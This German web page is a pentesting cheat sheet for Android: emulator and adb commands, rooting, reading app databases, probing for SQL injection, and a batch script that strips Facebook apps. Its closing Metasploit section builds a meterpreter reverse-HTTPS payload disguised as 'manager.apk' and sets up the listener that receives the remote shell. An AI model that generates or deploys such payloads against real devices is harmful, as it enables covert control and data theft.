Cookies, lecker Cookies :-)
Auch diese Seite analysiert, u.a. durch Cookies, deine Nutzung zwecks Reichweitenmessung sowie Optimierung und Personalisierung von Inhalten und Werbung. Eingebundene Dritte führen diese Informationen ggf. mit weiteren Daten zusammen. Details hierzu findest du in der Datenschutzerklärung. Du kannst deine Einstellungen jederzeit unter Cookie-Einstellungen unten auf der Seite ändern. Indem du auf der Seite weitersurfst, stimmst du – jederzeit für die Zukunft widerruflich – dieser Datenverarbeitung durch den Seitenbetreiber und Dritte zu. Weitere Informationen: Impressum
Nur notwendige Cookies akzeptieren
Ja, ich bin einverstanden!
Details

Notwendige Cookies

Diese Cookies sind immer aktiviert, da sie für Grundfunktionen der Website erforderlich sind. Hierzu zählen Cookies, mit denen gespeichert werden kann, wo auf der Seite du dich bewegst – während eines Besuchs oder, falls du es möchtest, auch von einem Besuch zum nächsten. Sie tragen sie zur sicheren und vorschriftsmäßigen Nutzung der Seite bei.
Marketing & Social

Marketing-Cookies werden verwendet, um Besuchern auf Webseiten zu folgen. Die Absicht ist, Anzeigen zu zeigen, die relevant und ansprechend für den einzelnen Benutzer sind und daher wertvoller für Publisher und werbetreibende Drittparteien sind.

Marc Hoffmann
Digital Marketing Experte
🔍
SUCHE
Abbrechen
Premium

Android App Pentesting


Info: Android App Dateien haben die Endung .apk sie können zu .zip umbenannt und entpackt werden!

In den classes.dex Dateien befindet sich der Quellcode der App.

Um diesen anzuzeigen ist es nötig, die Datei erst mit dex2jar in das .jar Format umzuwandeln und die .jar Datei dann mit JD… zu öffnen.

Android Studio Emulator starten

Wichtig: Nur Emulatoren im Android Studio ohne installierten Playstore laufen
unter root!

Windows Console öffnen (Windows + R und dann „cmd“ eingeben.)

cd C:\…\AppData\Local\Android\Sdk\emulator
emulator @pixel

Wenn Internetverbindung benötigt, dann:

emulator -avd pixel -gpu host -dns-server 8.8.8.8

Android Debug Bridge (adb) starten und root aktivieren

cd C:\platform-tools
adb start-server
adb devices
adb shell
su

VirtualBox NestedVirtual für Emulator aktivieren
In den Ordner der VirtualBox navigieren

VBoxManage list vms
VBoxManage modifyvm „name der virt“ – -nested-hw-virt on

Apache Server starten

/etc/init.d/apache2 start
systemctl status apache2

Die wichtigsten adb Befehle

Beenden der shell:

[Strg] + C

Useranzahl anzeigen:

cd data/user

Wenn nur ein Nutzer dann steht dort eine „0“
Der Ordner 0 kann geöffnet werden, via

cd 0
ls

Laufende Prozesse anzeigen:

ps -A

Adminstatus (root / user_0) anzeigen:

whoami

ip-Adresse anzeigen:

ifconfig
ifconfig -a
ifconfig -S

Systeminfos anzeigen:

uname -a

Aktuellen Pfad anzeigen:

pwd

Mehrere Befehle hintereinander ausführen (mit ; verketten):

pwd; ls; whoami

Jedem Prozess wird eine userId zugewiesen!
Beispiel: u0_a120

Emulatorversion anzeigen:

su
cat /proc/version

CPU Informationen anzeigen:

cat /proc/cpuinfo

App installieren:

adb install com.google.android…

App deinstallieren:

adb uninstall

Eingaben loggen:

adb logcat | grep ‚Suchwort‘

SQL-Injection identifizieren:

adb logcat

Und dann ‚ im Eingabefeld innerhalb der App eingeben.
Log gibt dann den sqlite3 Befehl SELECT * FROM DATENBANKNAME.. aus.


Paketmanager nutzen

Aktuellen Nutzer anzeigen:

pm list user

Facebook Services deinstallieren:

pm uninstall – -user 0 com.facebook.appmanager
pm uninstall – -user 0 com.facebook.services
pm uninstall – -user 0 com.facebook.system

Mit Pakte assoziierte Daten (Cache) deinstallieren:

adb shell pm clear com.facebook.appmanager
adb shell pm clear com.facebook.services
adb shell pm clear com.facebook.system

Nachträglich installierte Apps auflisten:

pm list packages -3

Virus entfernen:
1. Malware als Systemapp deaktivieren
2. Prüfen ob deaktiviert
3. Malware deinstallieren

adb shell pm disable-user – -user 0 <package_name>

adb shell pm list packages -d

adb uninstall <package_name>

Maximale Anzahl User anzeigen:

pm get-max-users

Kamera App öffnen:

am start -a android.media.action.IMAGE_CAPTURE

Video App öffnen:

am start -a android.media.action.VIDEO_CAPTURE

Gespeicherte App Daten anzeigen

Installierte Apps (Pakete) anzeigen (com.google.android…):

cd data/data
ls

Daten der App ansehen:

cd com.google.android…
ls

Shared-Preferences (XML-Dateien) ansehen:

cat DATEINAME

SQL-Datenbanken mit sqlite3 öffnen und Tabelleninhalte ansehen:

sqlite3
.open DATENBANKNAME
.tables
select * from TABELLENNAME;

Sqlite beenden:

.quit

Adb-Browser öffnen:

adb shell am start -a android.intent.action.VIEW -d http://coach-hoffmann.de

Adb Shell Script – Windows | speichern als: cleaner.bat


cd c:\platform-tools
cls
@echo off
echo Facebook / Instagram Entferner
echo _______________________________
echo.
echo Entfernt werden:
echo ————————-
echo com.facebook.katana
echo com.facebook.appmanager
echo com.facebook.services
echo com.facebook.system
echo com.facebook.orca
echo com.instagram.android
echo ————————-
echo.
echo Moechtest Du Facebook, den Messenger und Instagram
echo mit all Ihren Services (Lauscher) vom
echo Smartphone loeschen? (j / n)
SET /p wahl=
if ‚%wahl%‘ == ’n‘ goto Nein
if ‚%wahl%‘ == ‚j‘ goto Ja
Goto Ende
:Nein
echo.
echo ——————-
echo Ok, dann nicht!
echo ——————-
echo.
goto Ende
:Ja
adb shell pm uninstall –user 0 com.facebook.katana
adb shell pm uninstall –user 0 com.facebook.appmanager
adb shell pm uninstall –user 0 com.facebook.services
adb shell pm uninstall –user 0 com.facebook.system
adb shell pm uninstall –user 0 com.instagram.android
adb shell pm uninstall –user 0 com.facebook.orca
echo.
echo ————————————————————–
echo Erfolgreich! Dein Handy ist jetzt frei von Facebook und Co.!!!
echo ————————————————————–
:Ende
pause


Termux

Apache Server in Termux starten

apachectl -k start

ip-Adresse anzeigen:

ifconfig

Server im Browser aufrufbar unter:

ip-adresse:8080/

Websitedaten liegen in:

/data/data/com.termux/files/usr/share/apache2/default-site/htdocs

Apache Server in Termux stoppen

apachectl -k stop

Metasploit

Metasploit starten

msfconsole

Payload apk mit reverse https connection generieren

msfvenom -p android/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=xxxx R > ./manager.apk

Linstener aktivieren

set payload android/meterpreter/reverse_https

use exploit/multi/handler

set lhost xxx.xxx.xxx.xxx

set lpot xxx

exploit

help

Passwort benötigt?

Hier bekommst Du von mir die wirklich heißen Tipps und Passworte für die geschützten Premium-Artikel und Online-Tools. (Bild anklicken!) hintergrundwissen

Zum Seitenanfang